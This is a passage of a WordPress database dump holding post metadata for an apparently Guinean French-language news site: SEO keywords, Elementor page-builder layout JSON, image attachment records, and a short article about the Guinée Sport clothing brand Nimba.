d\'encouragement.<\\/p>\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-10\",\"bottom\":\"0\",\"left\":\"-4\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2562,791,'_elementor_version','0.4'),(2563,791,'_elementor_css','a:3:{s:4:\"time\";i:1509534247;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2566,681,'_yoast_wpseo_focuskw_text_input','Peinture en Guinée'),(2567,681,'_yoast_wpseo_focuskw','Peinture en Guinée'),(2568,681,'_yoast_wpseo_linkdex','56'),(2569,681,'_yoast_wpseo_content_score','30'),(2570,681,'_yoast_wpseo_primary_category',''),(2575,681,'_elementor_css','a:3:{s:4:\"time\";i:1509535233;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2618,678,'_yoast_wpseo_primary_category',''),(2619,678,'_yoast_wpseo_focuskw_text_input','J\'Awards Guinée'),(2620,678,'_yoast_wpseo_focuskw','J\'Awards Guinée'),(2621,678,'_yoast_wpseo_linkdex','56'),(2622,678,'_yoast_wpseo_content_score','30'),(2625,670,'_yoast_wpseo_content_score','30'),(2626,670,'_yoast_wpseo_primary_category',''),(2629,670,'_yoast_wpseo_focuskw_text_input','Colis\'mart'),(2630,670,'_yoast_wpseo_focuskw','Colis\'mart'),(2631,670,'_yoast_wpseo_linkdex','60'),(2632,815,'_wp_attached_file','2017/10/Fatou.jpg'),(2633,815,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:17:\"2017/10/Fatou.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Fatou-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Fatou-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2644,638,'_yoast_wpseo_content_score','30'),(2645,638,'_yoast_wpseo_primary_category',''),(2650,638,'_yoast_wpseo_focuskw_text_input','Café afrique'),(2651,638,'_yoast_wpseo_focuskw','Café afrique'),(2652,638,'_yoast_wpseo_linkdex','58'),(2655,822,'_wp_attached_file','2017/10/sb.jpg'),(2656,822,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:864;s:6:\"height\";i:855;s:4:\"file\";s:14:\"2017/10/sb.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"sb-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"sb-300x297.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:297;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"sb-768x760.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:760;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2659,632,'_yoast_wpseo_focuskw_text_input','Agriculture en Guinée'),(2660,632,'_yoast_wpseo_focuskw','Agriculture en Guinée'),(2661,632,'_yoast_wpseo_linkdex','28'),(2662,632,'_yoast_wpseo_content_score','30'),(2663,632,'_yoast_wpseo_primary_category',''),(2666,626,'_yoast_wpseo_primary_category',''),(2667,626,'_yoast_wpseo_focuskw_text_input','Quizz 224'),(2668,626,'_yoast_wpseo_focuskw','Quizz 224'),(2669,626,'_yoast_wpseo_linkdex','35'),(2670,626,'_yoast_wpseo_content_score','30'),(2681,619,'_yoast_wpseo_primary_category',''),(2682,619,'_yoast_wpseo_focuskw_text_input','Procédures administratives en Guinée'),(2683,619,'_yoast_wpseo_focuskw','Procédures administratives en Guinée'),(2684,619,'_yoast_wpseo_linkdex','41'),(2685,619,'_yoast_wpseo_content_score','30'),(2688,613,'_yoast_wpseo_content_score','30'),(2689,613,'_yoast_wpseo_primary_category',''),(2692,613,'_yst_is_cornerstone','1'),(2693,613,'_yoast_wpseo_focuskw_text_input','Innovation Guinée'),(2694,613,'_yoast_wpseo_focuskw','Innovation Guinée'),(2695,613,'_yoast_wpseo_linkdex','20'),(2696,826,'_wp_attached_file','2017/10/alpha.jpg'),(2697,826,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2017/10/alpha.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"alpha-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"alpha-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2702,827,'_elementor_edit_mode','builder'),(2703,827,'_elementor_data','[{\"id\":\"ektduot\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ztjkdwh\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"oqdpiml\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Guin\\u00e9e Sport est g\\u00e9r\\u00e9e par une dame qui entend faire de la marque Nimba une fiert\\u00e9 nationale. La nouvelle ligne de maillot a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 la bluezone de Conakry.<\\/p><p>Apr\\u00e8s deux ans, Guin\\u00e9e Sport a enfin r\\u00e9ussi \\u00e0 pr\\u00e9senter sa marque de v\\u00eatements de sport. Cette jeune entreprise offre quinze emplois fixes. La nouvelle marque Nimba a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 travers un d\\u00e9fil\\u00e9 et une exposition vente de maillots \\u00e0 Conakry.<\\/p><div><div class=\\\"wsw\\\"><p>Guin\\u00e9e Sport propose des maillots pour toutes les disciplines sportives et souhaite se faire accompagner par les autorit\\u00e9s sportives guin\\u00e9ennes.<\\/p><p>Avec ses sept machines \\u00e0 coudre, Guin\\u00e9e Sport a sign\\u00e9 avec trois clubs de football de premi\\u00e8re division, l\\u2019\\u00e9quipe nationale de handball et plusieurs \\u00e9quipes scolaires et universitaires de Guin\\u00e9e.<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9wrqrny\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"85cys9s\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"kxp87kg\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=4McQdO9Hwd0\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(2704,827,'_elementor_version','0.4'),(2705,827,'_elementor_css','a:3:{s:4:\"time\";i:1509461902;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2708,590,'_yoast_wpseo_primary_category',''),(2709,590,'_yst_is_cornerstone','1'),(2710,590,'_yoast_wpseo_focuskw_text_input','Journal rappé'),(2711,590,'_yoast_wpseo_focuskw','Journal rappé'),(2712,590,'_yoast_wpseo_linkdex','20'),(2713,590,'_yoast_wpseo_content_score','60'),(2716,603,'_elementor_css','a:3:{s:4:\"time\";i:1509541706;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2717,828,'_wp_attached_file','2017/10/sss.jpg'),(2718,828,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:720;s:4:\"file\";s:15:\"2017/10/sss.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"sss-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"sss-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"sss-768x461.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"sss-1024x614.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2719,829,'_wp_attached_file','2017/10/feu.jpg'),(2720,829,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:290;s:6:\"height\";i:174;s:4:\"file\";s:15:\"2017/10/feu.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"feu-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2721,411,'_thumbnail_id','828'),(2724,411,'_yoast_wpseo_content_score','30'),(2725,411,'_yoast_wpseo_primary_category','3'),(2728,411,'_yoast_wpseo_focuskw_text_input','Innovation en Guinée'),(2729,411,'_yoast_wpseo_focuskw','Innovation en Guinée'),(2730,411,'_yoast_wpseo_linkdex','28'),(2731,833,'_wp_attached_file','2017/10/97723064_img_20170730_131943.jpg'),(2732,833,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:624;s:6:\"height\";i:351;s:4:\"file\";s:40:\"2017/10/97723064_img_20170730_131943.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"97723064_img_20170730_131943-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"97723064_img_20170730_131943-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2733,405,'_thumbnail_id','833'),(2736,405,'_yoast_wpseo_focuskw_text_input','Micro barrage guinée'),(2737,405,'_yoast_wpseo_focuskw','Micro barrage guinée'),(2738,405,'_yoast_wpseo_linkdex','54'),(2739,405,'_yoast_wpseo_content_score','60'),(2740,405,'_yoast_wpseo_primary_category',''),(2741,835,'_edit_last','1'),(2742,835,'_edit_lock','1509546497:1'),(2743,836,'_wp_attached_file','2017/11/fc.jpg'),(2744,836,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2017/11/fc.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"fc-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"fc-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"fc-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"fc-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2745,837,'_wp_attached_file','2017/11/er.jpg'),(2746,837,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:817;s:4:\"file\";s:14:\"2017/11/er.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"er-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"er-300x255.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"er-768x654.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:7:\"Mohamed\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2747,835,'_wp_page_template','default'),(2750,835,'_yoast_wpseo_content_score','30'),(2751,835,'_yoast_wpseo_primary_category','17'),(2752,835,'_thumbnail_id','836'),(2757,835,'_yoast_wpseo_focuskw_text_input','Fatoumata Chérif'),(2758,835,'_yoast_wpseo_focuskw','Fatoumata Chérif'),(2759,835,'_yoast_wpseo_linkdex','34'),(2760,839,'_edit_last','1'),(2761,839,'_edit_lock','1509546799:1'),(2762,840,'_wp_attached_file','2017/11/sen.jpg'),(2763,840,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:221;s:6:\"height\";i:228;s:4:\"file\";s:15:\"2017/11/sen.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"sen-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2764,841,'_wp_attached_file','2017/11/sedd.png'),(2765,841,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:192;s:6:\"height\";i:192;s:4:\"file\";s:16:\"2017/11/sedd.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"sedd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2766,839,'_thumbnail_id','840'),(2767,839,'_wp_page_template','default'),(2770,839,'_yoast_wpseo_content_score','30'),(2771,839,'_yoast_wpseo_primary_category','3'),(2772,835,'post_views_count','467'),(2773,839,'post_views_count','100'),(2774,843,'_edit_last','1'),(2775,843,'_edit_lock','1509548239:1'),(2776,844,'_wp_attached_file','2017/11/plantation5_0.jpg'),(2777,844,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/11/plantation5_0.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"plantation5_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"plantation5_0-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"plantation5_0-768x410.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"plantation5_0-1024x546.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:546;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2778,843,'_thumbnail_id','844'),(2779,843,'_wp_page_template','default'),(2782,843,'_yoast_wpseo_content_score','30'),(2783,843,'_yoast_wpseo_primary_category','2'),(2784,843,'post_views_count','72'),(2787,843,'_yoast_wpseo_focuskw_text_input','Innovation agricole'),(2788,843,'_yoast_wpseo_focuskw','Innovation agricole'),(2789,843,'_yoast_wpseo_linkdex','39'),(2792,846,'_edit_last','1'),(2793,846,'_edit_lock','1509549164:1'),(2794,847,'_wp_attached_file','2017/11/aad.jpg'),(2795,847,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:350;s:4:\"file\";s:15:\"2017/11/aad.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"aad-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"aad-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:16:\"Picture Kiosk G4\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1428243282\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2796,846,'_thumbnail_id','847'),(2797,846,'_wp_page_template','default'),(2800,846,'_yst_is_cornerstone','1'),(2801,846,'_yoast_wpseo_focuskw_text_input','Kiraa'),(2802,846,'_yoast_wpseo_focuskw','Kiraa'),(2803,846,'_yoast_wpseo_linkdex','19'),(2804,846,'_yoast_wpseo_content_score','30'),(2805,846,'_yoast_wpseo_primary_category','3'),(2812,846,'post_views_count','85'),(2813,849,'_elementor_edit_mode','builder'),(2814,849,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_